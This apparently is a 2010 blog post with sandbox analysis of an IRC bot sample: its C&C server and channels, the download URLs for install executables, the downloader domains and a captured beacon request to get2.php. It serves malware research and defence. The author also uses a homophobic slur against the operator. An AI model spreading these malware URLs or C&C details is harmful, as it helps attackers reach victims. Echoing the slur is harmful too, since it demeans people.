tux.shannen.cc( Ogard the lamer)

By Pig, November 24, 2010

Resolved : [tux.shannen.cc] To [92.242.140.30]

tux.shannen.cc 92.243.24.240
0 127.0.0.1
onlinewebdll.com
onlinewebdll.com 66.197.218.184
mkm-libya.com
mkm-libya.com 41.254.33.54
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1034
Send Datagram: 131 packet(s) of size 1
Recv Datagram: 131 packet(s) of size 1
Download URLs
http://66.197.218.184/install.48691.exe (onlinewebdll.com)
http://41.254.33.54/install.48755.exe (mkm-libya.com)

C&C Server: 92.243.24.240:5900
Server Password:
Username: VirUs
Nickname: {NOVA}[DEU][XP-SP3]715708
JOIN ##Turb0-37##
Channel: ##Turb0-38## (Password: )
Channeltopic:
Outgoing connection to remote server: onlinewebdll.com TCP port 80
Outgoing connection to remote server: mkm-libya.com TCP port 80DNS Lookup
Host Name IP Address
cnet.com 64.30.224.118
sogou.com 61.135.188.225

Here downloaders used by that fagot:
210207da0831.gabspan.net

210207da0831.gabspan.net: type A, class IN, addr 202.150.208.66

210207da0832.aginder.net: type A, class IN, addr 202.150.208.66

HTTP:
GET /get​2.php?c=​TOKCNVIP​&d=2​6606B673​9323E372​E64636F3​17E3E3D2​12123222​62630787​47D456E7​579232D1​04740101​01012015​D404E166​81B1D1E0​37773057​50C01740​C097F0E7​E0A0F090​67704747​70073037​00F090E6​A2F27212​634206E6​5626E713​0303E663​D396A6B5​75706024​204020A5​5584C041​F1B0B1D4​D442D425​22A02141​3444A4B4​C4F4649B​9B5B2B6A​2F5F4E8E​BB4CFF3F​CE1E1FDF​5E3BCD6C​CD0B0FBF​CA8C5FEA​1ACB8FCC​CCFD6FCC​1989681D​F9F9E969​C8BC8928​197C08E8​593D5D9D​CD587D3D​DD3CD99A​9A5A3B7A​1F8F7F5F​1F9FFFFF​EFCFEF8F​6949D81 ​HTTP/1.1

Raw:
.’.?…​’..K..E.​..&Y​@…….​o….B.R​.P.D..S;​”:P…..​..GET /g​et2.php?​c=TOKCNV​IP&d​=26606B6​739323E3​72E64636​F317E3E3​D2121232​22626307​8747D456​E7579232​D1047401​01010120​15D404E1​6681B1D1​E0377730​5750C017​40C097F0​E7E0A0F0​90677047​47700730​3700F090​E6A2F272​12634206​E65626E7​130303E6​63D396A6​B5757060​24204020​A55584C0​41F1B0B1​D4D442D4​2522A021​413444A4​B4C4F464​9B9B5B2B​6A2F5F4E​8EBB4CFF​3FCE1E1F​DF5E3BCD​6CCD0B0F​BFCA8C5F​EA1ACB8F​CCCCFD6F​CC198968​1DF9F9E9​69C8BC89​28197C08​E8593D5D​9DCD587D​3DDD3CD9​9A9A5A3B​7A1F8F7F​5F1F9FFF​FFEFCFEF​8F6949D8​1 HTTP/1​.1..User​-Agent: ​Mozilla/​4.0 (com​patible;​ MSIE 7.​0; Windo​ws NT 5.​1; .NET ​CLR 1.1.​4322)..H​ost: 210​207da083​0.gabspa​n.net..C​ache-Con​trol: no​-cache..​..

Categories: Uncategorized